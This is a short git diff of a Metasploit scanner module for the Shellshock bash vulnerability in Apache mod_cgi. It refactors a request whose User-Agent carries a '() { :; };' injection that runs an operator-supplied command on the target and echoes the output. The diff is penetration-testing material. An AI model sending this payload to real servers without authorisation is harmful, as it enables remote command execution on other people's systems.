diff --git a/modules/auxiliary/scanner/http/apache_mod_cgi_bash_env.rb b/modules/auxiliary/scanner/http/apache_mod_cgi_bash_env.rb index 45fa5ae6e0..62fded16d8 100644 --- a/modules/auxiliary/scanner/http/apache_mod_cgi_bash_env.rb +++ b/modules/auxiliary/scanner/http/apache_mod_cgi_bash_env.rb @@ -42,13 +42,16 @@ class Metasploit4 < Msf::Auxiliary def run_host(ip) marker = Rex::Text.rand_text_alphanumeric(rand(42) + 1) + user_agent = %Q{() { :; }; echo "#{marker}$(#{datastore['CMD']})#{marker}"} res = send_request_raw( 'method' => datastore['METHOD'], 'uri' => normalize_uri(target_uri.path), - 'agent' => %Q{() { :; }; echo "#{marker}$(#{datastore['CMD']})#{marker}"} + 'agent' => user_agent ) + return if (res && res.body.include?(agent)) + if res && res.body =~ /#{marker}(.+)#{marker}/m print_good("#{peer} - #{$1}") report_vuln(